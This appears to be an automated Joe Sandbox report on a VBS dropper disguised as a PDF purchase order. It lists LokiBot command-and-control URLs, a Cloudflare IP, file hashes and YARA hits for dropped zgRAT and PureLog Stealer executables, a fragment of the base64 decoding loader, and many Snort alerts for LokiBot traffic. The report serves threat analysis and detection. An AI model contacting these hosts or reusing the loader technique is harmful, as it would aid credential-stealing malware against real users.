altaskifer.sbs	172.67.148.126	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://altaskifer.sbs/PWS/fre.php	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://altaskifer.sbs/PWS/fre.php	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.148.126	altaskifer.sbs	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1421256
Start date and time:	2024-04-06 09:28:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs renamed because original name is a hash value
Original Sample Name:	-_(PO_460387320)_pdf.vbs
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winVBS@7/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 49 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:29:25	API Interceptor	140x Sleep call for process: aspnet_compiler.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	fedex awb & invoice.vbs	Get hash	malicious	Unknown	Browse	172.67.215.45
	FEB-MAR SOA 2024.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.26.5.15
	https://boxpool-pro.firebaseapp.com/	Get hash	malicious	Unknown	Browse	172.64.150.248
	https://nft-openbox-e24a0.web.app/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://mysteryclick47.on.fleek.co/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://mysteryclicks40.on.fleek.co/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://claim-webopensea.web.app/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://mysteryclick39.on.fleek.co/	Get hash	malicious	Unknown	Browse	172.64.150.248
	https://mysteryclicks20.on.fleek.co/	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\188E93\31437F.exe	6038732).vbs	Get hash	malicious	Lokibot	Browse
	cirby0J3LP.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm, zgRAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse
	50000PCSPIC12F1501-ESN.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe	Get hash	malicious	XWorm	Browse
	Jdxvyx.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exe	Get hash	malicious	AgentTesla	Browse
	shipping_doc_62085317440.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	309760
Entropy (8bit):	6.909465550785168
Encrypted:	false
SSDEEP:	6144:soNzeBVxZLh3JBSc7eDP0GzBUi+PScPJq8s7WtEAmg+:VoftSc7Cff+PScBq8s7WtEAmD
MD5:	F5259113B28AA9CB170D1D4C7003F79F
SHA1:	4A4D7845A0C998EAE218D0679CF523FCE936E513
SHA-256:	5325F01A1F5A633A64A42107D1B7D730732B73298E58B266C6197278BCB5595F
SHA-512:	D9020D437328C2E3D9D0E9F8184373A9F48C821C07B2E05103A91FD58829447C34D8DB63C7D8A04EBA01009892B3983D459BD6CA987B4E7D781A7F314158645D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 40%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.f..............0.................. ........@.. ....................... ............`.....................................K...................................9................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(O..Yp...........................................(....(M...(x...8......(...8....(k...8....&~..........~......0..........8........E....9...........84.....(U...%& .l..(U...%& .l..(U...%&(.... .l..(U...%& .l..(U...%&o....%& .l..(U...%& .l..(U...%&o.... .l..(U...%& .l..(U...%&o....%& .l..(U...%& .l..(U...%&o....(......8.....*(}...8J....(E...(....%&%.(E......%.(E...~.....%..(E......%..(E.....(E........... ....(....9....&8....(....(....%&.. ....(....:...

C:\Users\user\AppData\Roaming\188E93\31437F.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56368
Entropy (8bit):	6.120994357619221
Encrypted:	false
SSDEEP:	768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
MD5:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
SHA1:	19DFD86294C4A525BA21C6AF77681B2A9BBECB55
SHA-256:	99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
SHA-512:	94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 6038732).vbs, Detection: malicious, Browse Filename: cirby0J3LP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse Filename: Jdxvyx.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exe, Detection: malicious, Browse Filename: shipping_doc_62085317440.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(......(....-...~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	884BB48A55DA67B4812805CB8905277D
SHA1:	6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
SHA-256:	78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
SHA-512:	989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.................................................

Static File Info

General

File type:	ASCII text, with very long lines (65294), with CRLF line terminators
Entropy (8bit):	4.876074580626131
TrID:
File name:	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs
File size:	520'546 bytes
MD5:	055c0925042cb8d785f50c598449a755
SHA1:	b9a1ef638c9f8445ee5f8d9536a752e85f6264a5
SHA256:	262001fa47c949d07b1998343285eff24a6c5603f5d60946bee05728412bfe5a
SHA512:	b04316d155e50aac59c0dd85e3e10445fab222fa3aaf95522a3f604c083b9a2d5311326714ed316a850889b7af3b9c250c55e9f9322d5f8eedb92107428243bd
SSDEEP:	6144:joo0L2LxOF3NXwg6+IPhlyS8AW1KWTTVT/qaNKk4dcZvV++9VsK3VcVVYASzkIDL:jGtNXwd+IuvAW1Kub4detsngASzkIDXb
TLSH:	6DB48DA6FF233DC22A5CC4938B450BFBFCA468AD42926760B5EEFA54351C472285DD0D
File Content Preview:	Dim x, y, z..x = "MSXML2.DOMDocument"..y = "text"..z = "bin.base64"....Set obj1 = CreateObject(x)..Set obj2 = obj1.createElement(y)..obj2.DataType = z....' Replace "yourbase64strjbg" with your actual base64 encoded content..Dim base64String..base64String

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/06/24-09:29:38.036927	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.6	172.67.148.126
04/06/24-09:29:36.488685	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.6	172.67.148.126
04/06/24-09:30:53.641650	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49835	80	192.168.2.6	172.67.148.126
04/06/24-09:30:51.314444	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.6	172.67.148.126
04/06/24-09:30:13.652600	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.6	172.67.148.126
04/06/24-09:30:53.641650	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.861510	TCP	2025381	ET TROJAN LokiBot Checkin	49818	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.957388	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49829	80	192.168.2.6	172.67.148.126
04/06/24-09:30:50.516269	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49831	80	192.168.2.6	172.67.148.126
04/06/24-09:29:36.488685	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.6	172.67.148.126
04/06/24-09:30:28.779878	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49803	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.907019	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.6	172.67.148.126
04/06/24-09:30:29.547586	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.124910	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.6	172.67.148.126
04/06/24-09:31:19.370644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49865	80	192.168.2.6	172.67.148.126
04/06/24-09:30:02.814837	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.6	172.67.148.126
04/06/24-09:30:48.181654	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49828	80	192.168.2.6	172.67.148.126
04/06/24-09:31:21.669304	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49868	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.204192	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.6	172.67.148.126
04/06/24-09:30:31.907019	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.961991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49871	80	192.168.2.6	172.67.148.126
04/06/24-09:29:59.690030	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49766	80	192.168.2.6	172.67.148.126
04/06/24-09:31:18.590588	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49864	80	192.168.2.6	172.67.148.126
04/06/24-09:30:00.493399	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.6	172.67.148.126
04/06/24-09:29:28.699735	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.204192	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49810	80	192.168.2.6	172.67.148.126
04/06/24-09:30:42.736556	TCP	2025381	ET TROJAN LokiBot Checkin	49821	80	192.168.2.6	172.67.148.126
04/06/24-09:31:21.669304	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49868	80	192.168.2.6	172.67.148.126
04/06/24-09:30:54.422589	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49836	80	192.168.2.6	172.67.148.126
04/06/24-09:31:11.610579	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49857	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.799315	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49741	80	192.168.2.6	172.67.148.126
04/06/24-09:30:17.895022	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.6	172.67.148.126
04/06/24-09:30:25.641172	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49799	80	192.168.2.6	172.67.148.126
04/06/24-09:29:44.242163	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.6	172.67.148.126
04/06/24-09:29:56.595283	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.961991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49871	80	192.168.2.6	172.67.148.126
04/06/24-09:30:46.592042	TCP	2025381	ET TROJAN LokiBot Checkin	49826	80	192.168.2.6	172.67.148.126
04/06/24-09:31:17.815577	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49863	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.860100	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.6	172.67.148.126
04/06/24-09:30:57.593507	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49840	80	192.168.2.6	172.67.148.126
04/06/24-09:31:17.815577	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49863	80	192.168.2.6	172.67.148.126
04/06/24-09:30:21.735500	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49794	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.891260	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.970310	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.6	172.67.148.126
04/06/24-09:29:35.705322	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.891260	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.6	172.67.148.126
04/06/24-09:29:53.470085	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49758	80	192.168.2.6	172.67.148.126
04/06/24-09:29:38.036927	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.862546	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.6	172.67.148.126
04/06/24-09:29:37.260471	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.862546	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.6	172.67.148.126
04/06/24-09:29:30.251229	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.128553	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.6	172.67.148.126
04/06/24-09:30:37.305241	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49815	80	192.168.2.6	172.67.148.126
04/06/24-09:30:10.531874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.203747	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.6	172.67.148.126
04/06/24-09:30:35.733011	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.6	172.67.148.126
04/06/24-09:30:37.305241	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49815	80	192.168.2.6	172.67.148.126
04/06/24-09:30:06.739588	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.891670	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49774	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.970310	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.035047	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.6	172.67.148.126
04/06/24-09:29:42.690473	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49746	80	192.168.2.6	172.67.148.126
04/06/24-09:31:24.825007	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49872	80	192.168.2.6	172.67.148.126
04/06/24-09:30:10.531874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.6	172.67.148.126
04/06/24-09:29:40.344957	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.6	172.67.148.126
04/06/24-09:30:49.735329	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49830	80	192.168.2.6	172.67.148.126
04/06/24-09:29:43.454363	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.6	172.67.148.126
04/06/24-09:30:49.735329	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49830	80	192.168.2.6	172.67.148.126
04/06/24-09:30:32.673178	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49808	80	192.168.2.6	172.67.148.126
04/06/24-09:31:07.768549	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49851	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.079276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.6	172.67.148.126
04/06/24-09:30:34.975531	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49811	80	192.168.2.6	172.67.148.126
04/06/24-09:29:34.079276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.799677	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.6	172.67.148.126
04/06/24-09:31:15.463121	TCP	2025381	ET TROJAN LokiBot Checkin	49862	80	192.168.2.6	172.67.148.126
04/06/24-09:31:07.768549	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49851	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.921065	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.6	172.67.148.126
04/06/24-09:29:33.293191	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.6	172.67.148.126
04/06/24-09:29:58.921065	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.6	172.67.148.126
04/06/24-09:29:29.470677	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.986411	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.6	172.67.148.126
04/06/24-09:29:29.470677	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.6	172.67.148.126
04/06/24-09:30:38.088060	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49816	80	192.168.2.6	172.67.148.126
04/06/24-09:30:05.124910	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.6	172.67.148.126
04/06/24-09:31:05.441892	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49848	80	192.168.2.6	172.67.148.126
04/06/24-09:29:39.580792	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.6	172.67.148.126
04/06/24-09:30:27.986411	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.6	172.67.148.126
04/06/24-09:29:26.328739	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49720	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.812911	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49761	80	192.168.2.6	172.67.148.126
04/06/24-09:31:05.441892	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49848	80	192.168.2.6	172.67.148.126
04/06/24-09:31:02.332845	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49844	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.920859	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.6	172.67.148.126
04/06/24-09:31:01.546959	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49843	80	192.168.2.6	172.67.148.126
04/06/24-09:31:23.194950	TCP	2025381	ET TROJAN LokiBot Checkin	49870	80	192.168.2.6	172.67.148.126
04/06/24-09:29:55.035047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.6	172.67.148.126
04/06/24-09:29:25.556361	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.6	172.67.148.126
04/06/24-09:30:24.081982	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.206380	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49849	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.865138	TCP	2025381	ET TROJAN LokiBot Checkin	49834	80	192.168.2.6	172.67.148.126
04/06/24-09:31:01.546959	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.6	172.67.148.126
04/06/24-09:30:41.966393	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.6	172.67.148.126
04/06/24-09:29:46.581121	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.6	172.67.148.126
04/06/24-09:30:20.206304	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.6	172.67.148.126
04/06/24-09:29:42.690473	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.6	172.67.148.126
04/06/24-09:31:02.332845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.018070	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.6	172.67.148.126
04/06/24-09:29:53.470085	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.6	172.67.148.126
04/06/24-09:31:06.206380	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49849	80	192.168.2.6	172.67.148.126
04/06/24-09:30:52.096160	TCP	2025381	ET TROJAN LokiBot Checkin	49833	80	192.168.2.6	172.67.148.126
04/06/24-09:29:45.018070	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.6	172.67.148.126
04/06/24-09:31:04.659572	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49847	80	192.168.2.6	172.67.148.126
04/06/24-09:29:47.378472	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.6	172.67.148.126
04/06/24-09:29:53.470085	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.6	172.67.148.126
04/06/24-09:29:51.123133	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.6	172.67.148.126
04/06/24-09:29:41.115114	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.6	172.67.148.126
04/06/24-09:31:00.769505	TCP	2025381	ET TROJAN LokiBot Checkin	49842	80	192.168.2.6	172.67.148.126
04/06/24-09:31:04.659572	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49847	80	192.168.2.6	172.67.148.126
